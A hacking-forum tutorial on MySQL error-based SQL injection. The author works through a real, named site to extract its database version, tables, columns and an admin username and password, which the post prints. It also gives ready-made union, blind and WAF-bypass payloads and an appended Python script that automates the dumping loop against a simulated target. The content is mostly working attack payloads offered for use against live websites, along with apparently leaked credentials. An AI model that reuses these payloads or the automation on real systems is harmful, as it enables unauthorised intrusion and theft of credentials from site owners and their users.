Error Based Injection By Gamer Geni | General Hacking | Crax

Gamer_Geni (Member, joined Jan 10, 2021)

Error Based Injection

Introduction

So lately I've been trying to take the time to make an error based tutorial.
I should have had it done already, but I was saving it for 1337 posts!

Anyways, I'll be using this site as an example.

You don't need to go into error based for this site, but I'm going to anyway, just for the tutorial.
Error based injection is really helpful when you run into what I call "stupid errors". Here are a few examples.

Code:
1. The used SELECT statements have a different number of columns.
2. Unknown column '1' in 'order clause' (or '0').
3. Can't find your columns in the page source.
4. Error #1604

The list goes on; error based is really useful for times like these.

Getting The Version

So what we want to do is force an error that echoes the data we want back to us. MySQL evaluates a GROUP BY key expression once to look it up in its temporary table and, when the key is absent, a second time while inserting it; because rand(0) is seeded and moves on between those two evaluations, the same key can end up being inserted twice, and the resulting duplicate entry error prints the key, including whatever we concatenated into it.
Let's check the version before we go after the tables, because if it's lower than 5 these queries won't work: information_schema only exists from MySQL 5.0 on.

Code:
+or+1+group+by+concat_ws(0x7e,version(),floor(rand(0)*2))+having+min(0)+or+1--

So now my url looks like this.

Code:
http://www.leadacidbatteryinfo.org/...concat_ws(0x7e,version(),floor(rand(0)*2))+having+min(0)+or+1--

What we're looking for is the duplicate entry error, and as you can see, the site returns it:

Code:
Duplicate entry '5.1.52-log~1' for key 'group_key'

Getting The Table Names

The backend is 5.1.52, so information_schema exists and we can use it to pull data out of the tables.

So now let's start by getting our table names.

Code:
+and+(select+1+from+(select+count(*),concat((select(select+concat(cast(table_name+as+char),0x7e))+from+information_schema.tables+where+table_schema=0xDATABASEHEX+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)

So now my link looks like this.

Code:
http://www.leadacidbatteryinfo.org/...from+(select+count(*),concat((select(select+concat(cast(table_name+as+char),0x7e))+from+information_schema.tables+where+table_schema=database()+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)

We get our duplicate entry with the first table name.

Now we bump the offset in the limit clause to get the next table name.

Code:
www.leadacidbatteryinfo.org/newsdetail.php?id=52+and+(select+1+from+(select+count(*),concat((select(select+concat(cast(table_name+as+char),0x7e))+from+information_schema.tables+where+table_schema=database()+limit+1,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)

Now that we know how to get our table names, we just keep incrementing the offset in the limit clause until we come across a "juicy" table.

Code:
www.leadacidbatteryinfo.org/newsdetail.php?id=52+and+(select+1+from+(select+count(*),concat((select(select+concat(cast(table_name+as+char),0x7e))+from+information_schema.tables+where+table_schema=database()+limit+10,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)

Oh looky, tbladmin!

Getting The Columns

Now we want the columns out of that table, so we change the syntax a little and hex-encode the table name.

Code:
+and+(select+1+from+(select+count(*),concat((select(select+concat(cast(column_name+as+char),0x7e))+from+information_schema.columns+where+table_name=0xHEXOFTABLE+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)

So now my link looks like this.

Code:
www.leadacidbatteryinfo.org/newsdetail.php?id=52+and+(select+1+from+(select+count(*),concat((select(select+concat(cast(column_name+as+char),0x7e))+from+information_schema.columns+where+table_name=0x74626c61646d696e+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)

Remember that when we hex the table name, 0x always goes in front.
74626c61646d696e is the hex of my table name, tbladmin.

So far we have adminid

Now we increment the limit offset until we get the columns we want.

Code:
www.leadacidbatteryinfo.org/newsdetail.php?id=52+and+(select+1+from+(select+count(*),concat((select(select+concat(cast(column_name+as+char),0x7e))+from+information_schema.columns+where+table_name=0x74626c61646d696e+limit+1,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)

That returns username.

Code:
www.leadacidbatteryinfo.org/newsdetail.php?id=52+and+(select+1+from+(select+count(*),concat((select(select+concat(cast(column_name+as+char),0x7e))+from+information_schema.columns+where+table_name=0x74626c61646d696e+limit+2,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)

That returns password.

Getting Data Out Of Columns

So now we have adminid, username, and password.

Now we put those in a concat statement and select from the table we want.

Code:
+and+(select+1+from+(select+count(*),concat((select(select+concat(cast(concat(column1,0x7e,column2,0x7e,column3)+as+char),0x7e))+from+TABLENAME+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)

So now my link looks like this.

Code:
www.leadacidbatteryinfo.org/newsdetail.php?id=52+and+(select+1+from+(select+count(*),concat((select(select+concat(cast(concat(adminid,0x7e,username,0x7e,password)+as+char),0x7e))+from+tbladmin+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)

And I get the duplicate entry with the adminid, username and password:

Code:
Duplicate entry '1~ishir~ishir123~1' for key 'group_key'

BONUS!

I'm going to explain a few functions so you get a better understanding of what you're actually doing.

The Count Function

This one is pretty obvious: it counts rows. It's an easy way to check how many databases or tables there are. You can use it in many different injections; here are a few ways to use it in each injection type.

Let's say column 3 is our vulnerable column, out of 5 columns.

Union Based:
Code:
www.site.com/dork.php?id=null+union+select+1,2,count(schema_name),4,5+from+information_schema.schemata--
String Based:
Code:
www.site.com/dork.php?id=null'+union+select+1,2,count(schema_name),4,5+from+information_schema.schemata-- x
Error Based:
Code:
www.site.com/dork.php?id=5+and+(select+1+from+(select+count(*),concat((select(select+concat(cast(count(schema_name)+as+char),0x7e))+from+information_schema.schemata+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)
Blind:
Code:
www.site.com/dork.php?id=5+and+ascii(substring((select+concat(count(schema_name))+from+information_schema.schemata+limit+0,1),1,1))>0

The Substring Function
This is really useful in blind injection, because there you have to pull data out one character at a time.
Sometimes in error based injection you'll get "Subquery returns more than 1 row" instead; that means the inner select matched several rows, and a limit x,1 on it fixes that.

For example, let's say we want the first letter of the value in the username column of the admin table.

Code:
substring(DATA, start, length)

The second argument is the 1-based position to start at, and the third is how many characters to return (not an end position).

So let's say the username is admin, and the table name is admin.

Union Based:
Code:
www.site.com/dork.php?id=null+union+select+1,2,substring(username,1,1)+from+admin--

The returned letter would be 'a', because that's the first character.

Code:
www.site.com/dork.php?id=null+union+select+1,2,substring(username,1,5)+from+admin--

The returned value would be 'admin', because it takes 5 characters starting at the 1st.

Code:
www.site.com/dork.php?id=null+union+select+1,2,substring(username,3,5)+from+admin--

The returned value would be 'min', because it starts at the 3rd character and asks for up to 5, of which only three remain.

String Injection:
Code:
www.site.com/dork.php?id=null'+union+select+1,2,substring(username,1,1)+from+admin-- x

Error Based:
Code:
www.site.com/dork.php?id=5+and+(select+1+from+(select+count(*),concat((select(select+concat(cast(concat(substring(username,1,1))+as+char),0x7e))+from+admin+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)

Concat & Limit
On some sites group_concat, concat or concat_ws won't be available, so you need to use limit instead.

Let's say our table name is admin, and we get an error when we try something like this:

Code:
www.site.com/dork.php?id=null+union+select+1,2,group_concat(table_name,0x0a),4,5+from+information_schema.tables+where+table_schema=database()--

"Function group_concat does not exist in blahblahblah".

Instead, we use limit with concat, or just table_name on its own, to get them one at a time.

Code:
www.site.com/dork.php?id=null+union+select+1,2,table_name,4,5+from+information_schema.tables+where+table_schema=database()+limit+0,1--

It would give us our first table name.

Like & Between

Is the WAF getting on your nerves when you're trying to use =?
You can use keywords to get around that.

Let's say our table name is admin, and we're trying to get columns out of it.

Code:
www.site.com/dork.php?id=null+union+select+1,2,/*!concat*/(table_name),4,5+from+/*!information_schema*/.tables+/*!where*/+table_name=0x61646d696e--

We get a 403/406 error. We can use like instead of =.

Code:
www.site.com/dork.php?id=null+union+select+1,2,/*!concat*/(table_name),4,5+from+/*!information_schema*/.tables+/*!where*/+table_name+like+0x61646d696e--

You can also use between with the same value as both bounds; it works the same way.

Well, I'll be updating this soon, once I think of more stuff to add to it.
Please leave a comment if you learned something or liked it, thanks a lot!
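Below is an added example in Python, not code from Gamer_Geni's post, that shows why the floor(rand(0)*2) + group by trick produces the duplicate entry error and then automates the limit-offset loop from the table, column and data sections above. The payload templates are the ones used in this tutorial; the model of MySQL's GROUP BY temporary table (key evaluated once on lookup and again on insert) is the standard explanation of the trick. fake_target and the FAKE_TBLADMIN rows are constructed stand-ins for the vulnerable page and its data, so nothing here touches a real server.

```python
"""Error-based (duplicate-entry) extraction: the mechanism and the loop.

Added example, not code from the original post. Everything runs offline:
MySQL's GROUP BY temporary table is modelled in Python and the 'target' is a
constructed stand-in that answers with the same error text a MySQL 5.x
backend would. Names marked constructed are not from the post.
"""
import re

# floor(rand(0)*2) in MySQL: rand(0) is seeded, so every query sees the same
# sequence, which begins 0, 1, 1, 0, 1, 1. Six values cover the walk-through.
FLOOR_RAND0_X2 = [0, 1, 1, 0, 1, 1]

DUP_RE = re.compile(r"Duplicate entry '(.*)~\d' for key 'group_key'")

# The post's wrapper, with the scalar subquery left as a hole. '+' is the
# URL-encoded space the post uses; 0x7e is '~', the separator in the leak.
TEMPLATE = (
    "+and+(select+1+from+(select+count(*),concat((select(select+concat(cast("
    "{expr}+as+char),0x7e))+from+{source}+limit+{offset},1),floor(rand(0)*2))x"
    "+from+information_schema.tables+group+by+x)a)"
)


def simulate_group_by(leak, row_count, rand_seq=FLOOR_RAND0_X2):
    """Model grouping row_count rows by concat(leak, 0x7e, floor(rand(0)*2)).

    MySQL evaluates the GROUP BY key once to look it up in its temporary
    table and, when the key is absent, evaluates it again while inserting.
    rand(0) advances between the two evaluations, so the inserted key can
    differ from the one looked up; on a later row the lookup misses and the
    insert collides with a key that is already present. That collision is the
    'Duplicate entry' error, and it echoes the key, leak included. Returns the
    error text on collision, None if the query would have succeeded.
    """
    seq = iter(rand_seq)
    tmp_table = {}
    for _ in range(row_count):
        key = f"{leak}~{next(seq)}"          # evaluation 1: lookup
        if key in tmp_table:
            tmp_table[key] += 1
            continue
        key = f"{leak}~{next(seq)}"          # evaluation 2: insert
        if key in tmp_table:
            return f"Duplicate entry '{key}' for key 'group_key'"
        tmp_table[key] = 1
    return None


def parse_leak(page_text):
    """Return the value leaked in a duplicate-entry error, or None.

    Caveat: MySQL truncates the echoed key to 64 bytes, which is why long
    values are fetched in slices with substring() and limit.
    """
    m = DUP_RE.search(page_text)
    return m.group(1) if m else None


def to_hex_literal(text):
    """'tbladmin' -> '0x74626c61646d696e': a string MySQL accepts unquoted."""
    return "0x" + text.encode().hex()


def table_payload(offset):
    return TEMPLATE.format(expr="table_name", offset=offset,
                           source="information_schema.tables+where+table_schema=database()")


def column_payload(table, offset):
    return TEMPLATE.format(expr="column_name", offset=offset,
                           source=f"information_schema.columns+where+table_name={to_hex_literal(table)}")


def row_payload(table, columns, offset):
    return TEMPLATE.format(expr="concat(" + ",0x7e,".join(columns) + ")",
                           source=table, offset=offset)


def dump_rows(fetch, table, columns, max_rows=100):
    """Walk limit offsets 0, 1, 2, ... until the error (and so the data) stops."""
    rows = []
    for offset in range(max_rows):
        leak = parse_leak(fetch(row_payload(table, columns, offset)))
        if leak is None:
            break
        rows.append(leak.split("~"))
    return rows


# Constructed stand-in for the vulnerable page: reads the offset out of the
# payload and answers with MySQL's error text. The rows are made up.
FAKE_TBLADMIN = [("1", "alice", "s3cret"), ("2", "bob", "hunter2")]


def fake_target(payload):
    offset = int(re.search(r"\+limit\+(\d+),1\)", payload).group(1))
    if "+from+tbladmin+" in payload and offset < len(FAKE_TBLADMIN):
        return simulate_group_by("~".join(FAKE_TBLADMIN[offset]), row_count=50)
    return "<html>news item 52</html>"   # no error: offset is past the last row


if __name__ == "__main__":
    print(simulate_group_by("5.1.52-log", row_count=3))
    print(to_hex_literal("tbladmin"))
    print(dump_rows(fake_target, "tbladmin", ["adminid", "username", "password"]))
```

The first line printed is the post's version error, character for character. Two practical caveats the model makes visible: the collision needs at least three rows in the table being grouped over, which is why the payloads group over information_schema.tables rather than the target table, and the echoed key is cut at 64 bytes, which is why long values get sliced with substring().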